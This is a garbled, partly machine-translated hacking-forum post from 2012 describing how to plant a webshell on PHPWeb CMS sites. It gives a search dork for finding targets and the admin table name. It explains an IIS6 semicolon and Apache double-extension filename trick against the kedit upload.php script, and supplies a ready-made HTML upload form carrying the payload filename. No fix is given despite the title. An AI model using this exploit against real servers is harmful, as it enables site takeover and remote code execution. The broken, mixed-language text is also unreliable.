phpweb finished website full version through the kill injection vulnerability and fix-vulnerability warning-the black bar safety net

2012-11-09T00:00:00
ID MYHACK58:62201235469
Type myhack58
Reporter 佚名
Modified 2012-11-09T00:00:00

Description

Keywords: inurl:webmall/detail. php? id

Data table: pwn_base_admin

About to get shell

首先 登录 后台 admin.php

See the upload. php source code analysis for an afternoon, and then about understand that although the upload where only allowed to upload gif,jpg,png,bmp four types of files, but not the file name limit.

In other words, sb.php;a. jpg so the file is also allowed, as long as the server is IIS6 take to webshel, the 低 版本 的 apache 可以 试着 重 命名 为 sb.php.jpg

Then engage over only to find that here more than my leaner, my ass, and worship under three stone, and then just borrow it, I began and his like Is to take all of the source code, and then found a more streamlined

<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">

<input type="text" name="fileName" value="sb.php;a.jpg" />

<input type="hidden" name="attachPath" value="news/pics/" />

<input type="file" name="fileData" size="1 4" /></td>

<input type="submit" name="button" value="OK" />

</form>

First log on the background, 然后把上面的文件保存为xx.html modify action, and then re-upload, if it is iis6 on in uploaded View Source just fine.